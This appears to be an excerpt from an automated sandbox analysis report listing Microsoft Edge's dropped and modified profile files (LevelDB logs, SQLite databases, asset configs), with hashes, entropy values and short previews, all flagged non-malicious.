                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):332
                                                                                                                                                                                                                                                      Entropy (8bit):5.180435847329433
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1mLjL+q2PFi23oH+Tcwt9Eh1tIFUt8YWi17Pd11Zmw+YWi1mlLVkwOFi23oH/:2i1mHyvdZYeb9Eh16FUt87i1BX/+7i1U
                                                                                                                                                                                                                                                      MD5:E3163357C906045F4913B5A960B236D9
                                                                                                                                                                                                                                                      SHA1:0C2CBE9A94B9C7DE0A1C48438237EDD83C361DD6
                                                                                                                                                                                                                                                      SHA-256:7A76FBC270ED7C7977C527C49993179F26DD42ADF4D9F06FC035BED25867C76C
                                                                                                                                                                                                                                                      SHA-512:1076B2E23F00E7057D550BCC223918D60CB1076937CDAD0F983E15E1F4B78BCAA78BD272656D57A9A51E6717821B94B5E3D0129F65960F12BD49D7506A52FA86
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:39.528 2138 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/30-16:38:39.530 2138 Recovering log #3.2024/11/30-16:38:39.539 2138 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                      Entropy (8bit):0.46223736706012636
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuA:TouQq3qh7z3bY2LNW9WMcUvBuA
                                                                                                                                                                                                                                                      MD5:CB18FB1E14B659D9C1BA8EBAA086812F
                                                                                                                                                                                                                                                      SHA1:E9D89823D872490E7589100F6648A6D1C92D5E68
                                                                                                                                                                                                                                                      SHA-256:3058FD367B95D8C64B6A136D6F6C2C1EFE5ECA2B4E857B4EBEC7ADA6B5168DE4
                                                                                                                                                                                                                                                      SHA-512:510F9337C36CBE7F3C000F5594C18A15B2655FC10398DAC202D7EFBB21856C1855EB09DF027E3EFFD58F61043CF61588D8BC7AF1152DA26111A591E7409A760E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                      MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                      SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                      SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                      SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):341
                                                                                                                                                                                                                                                      Entropy (8bit):5.248255917310017
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi14q2PFi23oH+TcwtnG2tMsIFUt8YWi1kLVXZmw+YWi1kLVFkwOFi23oH+Tcwj:2i14vdZYebn9GFUt87i1kLVX/+7i1kL2
                                                                                                                                                                                                                                                      MD5:50D28604A364CD0355EFE6B237EF0E55
                                                                                                                                                                                                                                                      SHA1:2F0AC6129120F87AE17C8F94347FC8057C74383A
                                                                                                                                                                                                                                                      SHA-256:C405A555C1740F17F20D35E627B701DBF53CA17EFD3530A35E57871AF913504D
                                                                                                                                                                                                                                                      SHA-512:D6C04AE43B1D12046DDDBDF1BC175FEC5E25F51669B084EF6C068E4DC78B2497021486CB9354ED56372AEAC5E71D0C047C28BF525D6FB25B595191E1FB098792
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.527 730 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/30-16:38:33.528 730 Recovering log #3.2024/11/30-16:38:33.528 730 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):341
                                                                                                                                                                                                                                                      Entropy (8bit):5.248255917310017
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi14q2PFi23oH+TcwtnG2tMsIFUt8YWi1kLVXZmw+YWi1kLVFkwOFi23oH+Tcwj:2i14vdZYebn9GFUt87i1kLVX/+7i1kL2
                                                                                                                                                                                                                                                      MD5:50D28604A364CD0355EFE6B237EF0E55
                                                                                                                                                                                                                                                      SHA1:2F0AC6129120F87AE17C8F94347FC8057C74383A
                                                                                                                                                                                                                                                      SHA-256:C405A555C1740F17F20D35E627B701DBF53CA17EFD3530A35E57871AF913504D
                                                                                                                                                                                                                                                      SHA-512:D6C04AE43B1D12046DDDBDF1BC175FEC5E25F51669B084EF6C068E4DC78B2497021486CB9354ED56372AEAC5E71D0C047C28BF525D6FB25B595191E1FB098792
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.527 730 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/30-16:38:33.528 730 Recovering log #3.2024/11/30-16:38:33.528 730 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.6135285093920639
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWmCMAqYieiJ:TLapR+DDNzWjJ0npnyXKUO8+jzCpmemL
                                                                                                                                                                                                                                                      MD5:F7AF31786C7026630447793A4EBE9B5D
                                                                                                                                                                                                                                                      SHA1:A2BE60072E3478D539E700CFD86010EDF96C4523
                                                                                                                                                                                                                                                      SHA-256:9F1882BB52F068DC14E40D1929DE56A9CE80B5A3EE8ACBCA31CAA46525D68B6E
                                                                                                                                                                                                                                                      SHA-512:517FAF8966AEFC75C0727203A0BF5C92934BB8F4279779F85A7C04DF3EAEDE86561F58A4B114A7E6ECCA56312339C224B470B615592ECC64B19A38C1FDD37238
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):375520
                                                                                                                                                                                                                                                      Entropy (8bit):5.354162654059268
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:FA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:FFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                      MD5:BE930F43E81F64B83BC200B58A624026
                                                                                                                                                                                                                                                      SHA1:74B90F383B43A027EF8C974EFB261F315F595A44
                                                                                                                                                                                                                                                      SHA-256:BD5B0B5C6617A0ACFEF6FAD1148AA21339C182589196631BC2FAF560437DD0DF
                                                                                                                                                                                                                                                      SHA-512:7814EDCB7419C3C1AF339C5A04508032AD524C2FF043977ED3C4A586845B150B78B31ADDBA19AE87CBB656AE88A0A90C9A5F0E6FA54999CD66E7C390F47F1555
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13377476322565017..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):307
                                                                                                                                                                                                                                                      Entropy (8bit):5.247568506790274
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi17EQQB1Fi23oH+Tcwtk2WwnvB2KLlVWi1K+q2PFi23oH+Tcwtk2WwnvIFUv:2i17EBZYebkxwnvFLOi1rvdZYebkxwnp
                                                                                                                                                                                                                                                      MD5:7924652DA6FBF6C3525798792E78CB89
                                                                                                                                                                                                                                                      SHA1:5E0C0EB0B505532D0A024BE1C9578A6F0A9A5EDE
                                                                                                                                                                                                                                                      SHA-256:DC0CAE31934E93AACAF5DF1056455572002104372724AB21AF9AD09A7E2E04E5
                                                                                                                                                                                                                                                      SHA-512:E652CC9F8733C03848A2ECBDFFBF4FEF498F3FF67F0B11940EDC528EA3076A78E464492FB7481397DE5049635EDF1FA4AC02E4D4A748F19974C14B721F985DE6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:39.563 2148 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/30-16:38:39.598 2148 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):358860
                                                                                                                                                                                                                                                      Entropy (8bit):5.324608854496215
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Re:C1gAg1zfvW
                                                                                                                                                                                                                                                      MD5:DE86533A8FEF1B8568370BFA1E695A31
                                                                                                                                                                                                                                                      SHA1:4D2E0A3E5068F30617F724C9FF7116827AF21C06
                                                                                                                                                                                                                                                      SHA-256:B3A405809A7D9CAA10B2022E6B3E20226FC33EAAF271346277302AD163AB0611
                                                                                                                                                                                                                                                      SHA-512:F41887A46227F95CA64D28F9672D9F4B9A4AB02F6D3624355AA92C69E7BDFDB144FC306D714281138F3B0ABE39DA617427501D2522921772343B34C715F07CB3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):320
                                                                                                                                                                                                                                                      Entropy (8bit):5.2310481138255
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1iFN+q2PFi23oH+Tcwt8aPrqIFUt8YWi1iFmWZmw+YWi1iFNVkwOFi23oH+Ts:2i1e+vdZYebL3FUt87i17W/+7i1eV5w6
                                                                                                                                                                                                                                                      MD5:64F3BA7CFD647BDB8987D410B47713DF
                                                                                                                                                                                                                                                      SHA1:D783089367BF16D959460C31AFE5F53BB786F423
                                                                                                                                                                                                                                                      SHA-256:BE79C652968E8834F264A8516EBF9BEDB2A721FBF78A0E67FF56B4DF05B5DC34
                                                                                                                                                                                                                                                      SHA-512:1554038C7B064E17EF23C03A9CE02F591557543F7F6A87C8E1E8E7E505887640F5CB9016307EDA3DB0BD63FD90E255B2CFA9235E4057163AB9C997D92BEC0B6D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.554 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/30-16:38:33.554 1f5c Recovering log #3.2024/11/30-16:38:33.554 1f5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):320
                                                                                                                                                                                                                                                      Entropy (8bit):5.2310481138255
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1iFN+q2PFi23oH+Tcwt8aPrqIFUt8YWi1iFmWZmw+YWi1iFNVkwOFi23oH+Ts:2i1e+vdZYebL3FUt87i17W/+7i1eV5w6
                                                                                                                                                                                                                                                      MD5:64F3BA7CFD647BDB8987D410B47713DF
                                                                                                                                                                                                                                                      SHA1:D783089367BF16D959460C31AFE5F53BB786F423
                                                                                                                                                                                                                                                      SHA-256:BE79C652968E8834F264A8516EBF9BEDB2A721FBF78A0E67FF56B4DF05B5DC34
                                                                                                                                                                                                                                                      SHA-512:1554038C7B064E17EF23C03A9CE02F591557543F7F6A87C8E1E8E7E505887640F5CB9016307EDA3DB0BD63FD90E255B2CFA9235E4057163AB9C997D92BEC0B6D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.554 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/30-16:38:33.554 1f5c Recovering log #3.2024/11/30-16:38:33.554 1f5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):324
                                                                                                                                                                                                                                                      Entropy (8bit):5.255960772728252
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi16e+q2PFi23oH+Tcwt865IFUt8YWi1wmmWZmw+YWi1guH3VkwOFi23oH+Tcwx:2i16e+vdZYeb/WFUt87i13mW/+7i1gu+
                                                                                                                                                                                                                                                      MD5:7B0A5774A1D34C7283B5C3D98B39B066
                                                                                                                                                                                                                                                      SHA1:2B3FC0B6B30E333D8E94CBEC2663CB0B7E39F1FC
                                                                                                                                                                                                                                                      SHA-256:CAC0641C56ABD024C55BC43659BD255FE3BC8F6BCBA287FE0B3D03B828E63BAB
                                                                                                                                                                                                                                                      SHA-512:E3109538E2C85E56742EF66171FC0B73A2E91649605483C247BDC730115FD26EF416D8B507F0DB6E05AE54EE705579B91E03FE8F890200E69E992F2B0DB8B605
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.557 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/30-16:38:33.559 1f5c Recovering log #3.2024/11/30-16:38:33.560 1f5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):324
                                                                                                                                                                                                                                                      Entropy (8bit):5.255960772728252
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi16e+q2PFi23oH+Tcwt865IFUt8YWi1wmmWZmw+YWi1guH3VkwOFi23oH+Tcwx:2i16e+vdZYeb/WFUt87i13mW/+7i1gu+
                                                                                                                                                                                                                                                      MD5:7B0A5774A1D34C7283B5C3D98B39B066
                                                                                                                                                                                                                                                      SHA1:2B3FC0B6B30E333D8E94CBEC2663CB0B7E39F1FC
                                                                                                                                                                                                                                                      SHA-256:CAC0641C56ABD024C55BC43659BD255FE3BC8F6BCBA287FE0B3D03B828E63BAB
                                                                                                                                                                                                                                                      SHA-512:E3109538E2C85E56742EF66171FC0B73A2E91649605483C247BDC730115FD26EF416D8B507F0DB6E05AE54EE705579B91E03FE8F890200E69E992F2B0DB8B605
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:33.557 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/30-16:38:33.559 1f5c Recovering log #3.2024/11/30-16:38:33.560 1f5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                      MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                      SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                      SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                      SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):317
                                                                                                                                                                                                                                                      Entropy (8bit):5.205124286232872
